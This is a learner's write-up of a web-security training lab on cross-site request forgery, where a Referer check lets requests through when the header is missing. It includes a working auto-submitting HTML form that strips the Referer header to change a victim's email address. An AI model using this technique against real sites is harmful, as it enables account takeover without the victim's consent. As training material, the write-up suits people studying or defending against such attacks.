CSRF where Referer validation depends on header being present

Description

This lab's email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

Approach

After accessing the lab i intercepted the change email request and sent it to repeater for further analysis:

POST /my-account/change-email HTTP/2
Host: 0aff002e04e1335483eb827600d00030.web-security-academy.net
Cookie: session=f1uKEJDVcyqIDZlpygFXTC4DGWbRFJys
Content-Length: 19
...
Referer: https://0aff002e04e1335483eb827600d00030.web-security-academy.net/my-account?id=wiener
...

email=qwe%40qwe.qwe

What i noticed if i do even a small change in the referer header i get "Invalid referer header" error but what i found interesting is when i delete the header completely the request does get through so i need take this in mind when building my CSRF poc. I started crafting my CSRF poc and it look like this:

<html>
  <head>
    <meta name="referrer" content="never">
  </head>
  <body>
    <script>history.pushState('','','/')</script>>
    <form action="https://0a34001404c8439381bd340e0002006d.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="imdoingthis&#64;candthis&#46;htb" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

a simple html page hosted on my exploit server that have a form which will be auto submitted when visiting the exploit page but when the POST request fo the form will be sent will not have a referer header and that's due the meta tag added at the first of the html page:

<meta name="referrer" content="never">

so if i simply copy and paste this CSRf poc into my exploit server page and click Store and deliver exploit to victim i can see that the lab is solved which confirms that the victim's email is changed.